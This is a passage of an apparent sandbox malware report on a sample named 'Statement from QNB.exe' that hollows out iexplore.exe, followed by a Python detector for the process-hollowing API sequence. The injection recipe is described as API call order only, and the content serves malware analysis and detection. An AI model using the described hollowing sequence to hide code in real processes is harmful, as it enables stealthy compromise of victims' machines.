Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00414E71 17_2_00414E71
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00413E08 17_2_00413E08
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0040EE1C 17_2_0040EE1C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00403F73 17_2_00403F73
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BDA66 21_2_006BDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B3E05 21_2_006B3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C697A 21_2_006C697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BD382 21_2_006BD382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C2A7B 21_2_006C2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B9E10 21_2_006B9E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B10DE 21_2_006B10DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C30BF 21_2_006C30BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C4D65 21_2_006C4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BA561 21_2_006BA561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BA1E8 21_2_006BA1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BE1B9 21_2_006BE1B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEDA66 22_2_02CEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE3E05 22_2_02CE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CED382 22_2_02CED382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF697A 22_2_02CF697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE10DE 22_2_02CE10DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF30BF 22_2_02CF30BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF2A7B 22_2_02CF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE9E10 22_2_02CE9E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEA1E8 22_2_02CEA1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEE1B9 22_2_02CEE1B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF4D65 22_2_02CF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEA561 22_2_02CEA561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056DA66 23_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0057697A 23_2_0057697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00564379 23_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056D382 23_2_0056D382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00572A7B 23_2_00572A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00569E10 23_2_00569E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00563E05 23_2_00563E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005610DE 23_2_005610DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005730BF 23_2_005730BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00574D65 23_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056A561 23_2_0056A561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056A1E8 23_2_0056A1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056E1B9 23_2_0056E1B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9B9C8 25_3_00A9B9C8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9B9C8 25_3_00A9B9C8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9B9C8 25_3_00A9B9C8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_3_00A9B9C8 25_3_00A9B9C8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056DA66 25_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0057697A 25_2_0057697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00564379 25_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056D382 25_2_0056D382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00572A7B 25_2_00572A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00569E10 25_2_00569E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00563E05 25_2_00563E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005610DE 25_2_005610DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005730BF 25_2_005730BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00574D65 25_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056A561 25_2_0056A561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056A1E8 25_2_0056A1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056E1B9 25_2_0056E1B9
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056DA66 26_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0057697A 26_2_0057697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00564379 26_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056D382 26_2_0056D382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00572A7B 26_2_00572A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00569E10 26_2_00569E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00563E05 26_2_00563E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005610DE 26_2_005610DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005730BF 26_2_005730BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00574D65 26_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056A561 26_2_0056A561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056A1E8 26_2_0056A1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056E1B9 26_2_0056E1B9
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 004146FD appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00443360 appears 37 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00411538 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00442E56 appears 32 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00414AA6 appears 88 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 0041485E appears 67 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02306439 NtProtectVirtualMemory, 0_2_02306439
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F3E05 NtWriteVirtualMemory,TerminateProcess, 0_2_022F3E05
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FDA66 NtAllocateVirtualMemory,LoadLibraryA, 0_2_022FDA66
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230697A NtResumeThread, 0_2_0230697A
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02302A7B NtWriteVirtualMemory, 0_2_02302A7B
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02304D65 NtWriteVirtualMemory, 0_2_02304D65
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A, 14_2_00402CAC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A, 14_2_00402D66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF6439 NtProtectVirtualMemory, 15_2_02BF6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE3E05 NtWriteVirtualMemory,TerminateProcess, 15_2_02BE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEDA66 NtAllocateVirtualMemory,LoadLibraryA, 15_2_02BEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF697A NtUnmapViewOfSection, 15_2_02BF697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF2A7B NtWriteVirtualMemory, 15_2_02BF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF4D65 NtWriteVirtualMemory, 15_2_02BF4D65
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040172C NtdllDefWindowProc_A, 18_2_0040172C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_004017FE NtdllDefWindowProc_A, 18_2_004017FE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BDA66 NtAllocateVirtualMemory,LoadLibraryA, 21_2_006BDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C6439 NtProtectVirtualMemory, 21_2_006C6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B3E05 NtWriteVirtualMemory,TerminateProcess, 21_2_006B3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C2A7B NtWriteVirtualMemory, 21_2_006C2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C4D65 NtWriteVirtualMemory, 21_2_006C4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEDA66 NtAllocateVirtualMemory,LoadLibraryA, 22_2_02CEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE3E05 NtWriteVirtualMemory,TerminateProcess, 22_2_02CE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF6439 NtProtectVirtualMemory, 22_2_02CF6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF2A7B NtWriteVirtualMemory, 22_2_02CF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF4D65 NtWriteVirtualMemory, 22_2_02CF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 23_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00576439 NtProtectVirtualMemory, 23_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00564379 NtProtectVirtualMemory, 23_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005643DF NtProtectVirtualMemory, 23_2_005643DF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 25_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00576439 NtProtectVirtualMemory, 25_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00564379 NtProtectVirtualMemory, 25_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005643DF NtProtectVirtualMemory, 25_2_005643DF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 26_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00576439 NtProtectVirtualMemory, 26_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00564379 NtProtectVirtualMemory, 26_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005643DF NtProtectVirtualMemory, 26_2_005643DF
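Read together, the native calls listed above are the process-hollowing recipe: NtUnmapViewOfSection empties the suspended target's image, NtAllocateVirtualMemory and NtWriteVirtualMemory put the payload in its place, NtProtectVirtualMemory fixes up page permissions, and NtResumeThread starts it. Any one of these calls is common in benign software; the signal is the ordered sequence against a foreign process. The following is an added example, not Joe Sandbox's signature logic: it matches that ordered subsequence per (caller, target) pair over a constructed API trace. The trace format (caller, target, api) is an assumption standing in for an API-monitor or EDR feed, and the process numbers reuse the report's 0_/14_ style indices rather than real PIDs.

```python
from collections import defaultdict

# Ordered API subsequences. The names are the Nt* calls listed in the report; the
# ordering is the classic hollowing recipe (unmap the target's image, allocate and
# write a new one, resume the suspended main thread). NtProtectVirtualMemory may
# appear anywhere in between and is not required.
HOLLOWING = ("NtUnmapViewOfSection", "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtResumeThread")
REMOTE_INJECTION = ("NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtResumeThread")

# Constructed trace: (caller, target, api). 0 stands for Statement from QNB.exe and
# 14 for iexplore.exe, following the report's indices; they are not real PIDs.
SAMPLE_TRACE = [
    (0, 14, "NtUnmapViewOfSection"),
    (0, 14, "NtAllocateVirtualMemory"),
    (0, 14, "NtWriteVirtualMemory"),
    (0, 14, "NtWriteVirtualMemory"),
    (0, 14, "NtProtectVirtualMemory"),
    (0, 14, "NtResumeThread"),
    (0, 0, "NtAllocateVirtualMemory"),    # self-allocation: unpacking, not injection
    (99, 100, "NtReadVirtualMemory"),     # debugger-style read of another process: no verdict
    (20, 21, "NtResumeThread"),           # the injection calls, but out of order
    (20, 21, "NtAllocateVirtualMemory"),
    (20, 21, "NtWriteVirtualMemory"),
]


def in_order(calls, pattern):
    """True if every name in pattern occurs in calls in that order (other calls may interleave)."""
    it = iter(calls)
    return all(any(call == wanted for call in it) for wanted in pattern)


def classify(trace):
    """Map each (caller, target) pair of distinct processes to the strongest matching verdict."""
    per_pair = defaultdict(list)
    for caller, target, api in trace:
        if caller != target:                       # calls on one's own process are not injection
            per_pair[(caller, target)].append(api)
    verdicts = {}
    for pair, calls in per_pair.items():
        if in_order(calls, HOLLOWING):
            verdicts[pair] = "process hollowing"
        elif in_order(calls, REMOTE_INJECTION):
            verdicts[pair] = "remote code injection"
        elif "NtWriteVirtualMemory" in calls:
            verdicts[pair] = "foreign memory write"
    return verdicts


if __name__ == "__main__":
    for (caller, target), verdict in classify(SAMPLE_TRACE).items():
        print(f"process {caller} -> process {target}: {verdict}")
```

The out-of-order pair (20, 21) is deliberately downgraded: a resume before any write cannot have started injected code, so the write alone is reported. Where Nt* call traces are not available, Sysmon ProcessAccess events carrying PROCESS_VM_WRITE together with PROCESS_SUSPEND_RESUME in the granted access mask are the closest substitute for the allocate/write/resume part of the sequence.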
Abnormally high CPU usage
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process Stats: CPU usage > 98%
Sample file name differs from the original file name in its version info
